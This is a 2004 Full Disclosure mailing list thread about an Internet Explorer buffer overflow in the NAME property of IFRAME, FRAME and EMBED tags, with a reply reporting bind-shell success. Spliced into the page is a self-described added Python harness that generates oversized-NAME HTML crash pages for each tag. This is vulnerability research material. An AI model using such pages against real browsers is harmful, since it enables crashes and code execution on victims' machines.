Full Disclosure mailing list archives
Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
From: "Berend-Jan Wever" <skylined () edup tudelft nl>
Date: Mon, 8 Nov 2004 02:14:31 +0100
Hmmm... MSDN DHTML Reference mentions 6 different flavors of the NAME property:
1) For a lot of tags like A, APPLET, IMG, INPUT, etc... this includes EMBED
2) FRAME, FRAMESET, IFRAME
3) META
4) namespace
5) PARAM
6) window

I figured all the tags mentioned under 2 were affected and the rest weren't. Now I hear <EMBED> is also working? Somebody might wanna go through each and every tag to see which are affected and which aren't.

SHDOCVW.DLL versions 6.0.2800.1400 and 6.0.2800.1584 are known to be vulnerable. SHDOCVW.DLL version 6.00.2900.2518 seems to be immune to the BoF (ships with XP PRO SP2).

The immune version got me wondering if they knew about the bug? If not, did they expect the code could be buggy and just rewrote it to be sure it was safe for SP2? Or was there just a code rewrite or another reason why the bug got silently fixed...? I hope they fixed it by accident, seeing what the other option would imply.

Cheers,
SkyLined

----- Original Message -----
From: "Menashe Eliezer" <menashe () finjan com>
To: "Berend-Jan Wever" <skylined () edup tudelft nl>; <full-disclosure () lists netsys com>
Sent: Sunday, November 07, 2004 23:21
Subject: RE: [Full-disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
The published exploit also works with the <EMBED> tag, and not just with the <IFRAME> and the <FRAME> tags.

Finjan's advisory can be found at:
http://www.finjan.com/SecurityLab/AttackandExploitReports/alert_show.asp?attack_release_id=114

==
Regards,
Menashe Eliezer
Senior application security architect
Malicious Code Research Center
Finjan Software
http://www.finjan.com/mcrc
Prevention is the best cure!

-----Original Message-----
From: morning_wood [mailto:se_cur_ity () hotmail com]
Sent: Tuesday, November 02, 2004 3:44 PM
To: Berend-Jan Wever; full-disclosure () lists netsys com; bugtraq () securityfocus com
Subject: Re: [Full-disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

bindshell success (html run from local)
connect from remote success...
this is NASTY
if shellcode modified this will do reverse or exe drop i assume....

good work,
Donnie Werner

-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
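SkyLined suggests that somebody go through every tag that carries a NAME property and check which ones are affected. The harness below is an added example for doing that triage; it is not the PoC from the thread and contains no shellcode. It writes one small HTML page per tag, each with an oversized NAME value, plus an index page, so that each case can be loaded on its own in the browser under test (with a debugger attached) and a crash can be attributed to exactly one tag. The tag list follows the MSDN "flavors" quoted in the message ("namespace" and "window" are scripting objects, not elements, so they get no page); the page layout per tag, the 4096-byte length and the "A" fill byte are assumptions, since the thread does not give the original PoC's values.

```python
"""
Per-tag NAME-attribute test-page generator (added example, not the PoC from the thread).

Each page exercises exactly one tag with an oversized NAME value. Loading the
pages one at a time, rather than putting every tag on a single page, is what
makes a crash attributable to a specific tag.
"""
from pathlib import Path
from typing import Dict, List

# Tags taken from the six NAME "flavors" listed in the message. The surrounding
# markup for each tag is an assumption chosen so the element is parsed in a
# valid context (FRAME inside FRAMESET, PARAM inside OBJECT, META in HEAD).
TAG_TEMPLATES: Dict[str, str] = {
    "A":        '<a name="{v}" href="#">x</a>',
    "APPLET":   '<applet name="{v}" code="x.class" width="1" height="1"></applet>',
    "EMBED":    '<embed name="{v}" src="x" width="1" height="1">',
    "IMG":      '<img name="{v}" src="x">',
    "INPUT":    '<input name="{v}" type="text">',
    "FRAME":    '<frameset rows="*"><frame name="{v}" src="about:blank"></frameset>',
    "FRAMESET": '<frameset name="{v}" rows="*"><frame src="about:blank"></frameset>',
    "IFRAME":   '<iframe name="{v}" src="about:blank"></iframe>',
    "META":     '<meta name="{v}" content="x">',
    "PARAM":    '<object><param name="{v}" value="x"></object>',
}

DEFAULT_LENGTH = 4096   # assumed; the thread does not state the PoC's length
FILL = "A"              # assumed fill byte; plain ASCII keeps the attribute well-formed


def name_value(length: int = DEFAULT_LENGTH, fill: str = FILL) -> str:
    """Build the oversized NAME value from a single alphanumeric fill character."""
    if len(fill) != 1 or not fill.isalnum():
        raise ValueError("fill must be one alphanumeric character")
    if length <= 0:
        raise ValueError("length must be positive")
    return fill * length


def build_page(tag: str, length: int = DEFAULT_LENGTH) -> str:
    """Return a complete HTML document exercising a single tag's NAME property."""
    tag = tag.upper()
    if tag not in TAG_TEMPLATES:
        raise KeyError(f"no template for tag {tag}")
    element = TAG_TEMPLATES[tag].format(v=name_value(length))
    head = f"<head><title>{tag}</title></head>"
    if tag in ("FRAME", "FRAMESET"):
        # FRAMESET replaces BODY; nesting it inside <body> changes how it is parsed.
        return f"<html>{head}{element}</html>"
    if tag == "META":
        return f"<html><head><title>{tag}</title>{element}</head><body></body></html>"
    return f"<html>{head}<body>{element}</body></html>"


def write_pages(outdir: Path, length: int = DEFAULT_LENGTH) -> List[Path]:
    """Write one page per tag plus an index.html linking them; return the page paths."""
    outdir.mkdir(parents=True, exist_ok=True)
    written: List[Path] = []
    for tag in TAG_TEMPLATES:
        path = outdir / f"name_{tag.lower()}.html"
        path.write_text(build_page(tag, length), encoding="ascii")
        written.append(path)
    links = "\n".join(f'<a href="{p.name}">{p.name}</a><br>' for p in written)
    (outdir / "index.html").write_text(f"<html><body>{links}</body></html>", encoding="ascii")
    return written


if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1] if len(sys.argv) > 1 else "name_cases")
    for page in write_pages(target):
        print(page)
```

Run it with an output directory, copy the directory to the test machine, and open the pages from index.html one at a time under a debugger. A tag whose page crashes the browser with the long NAME but not with a short one (pass a small length to build_page) belongs on the "affected" side of the list SkyLined asks for; record the SHDOCVW.DLL version alongside each result, since the message notes that behaviour differs between 6.0.2800.x and 6.00.2900.2518.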
Current thread:
- MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 01)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) morning_wood (Nov 02)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Georgi Guninski (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) pachiderme pachiderme (Nov 09)
- <Possible follow-ups>
- RE: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Menashe Eliezer (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) patryn (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Valdis . Kletnieks (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Jim Geovedi (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)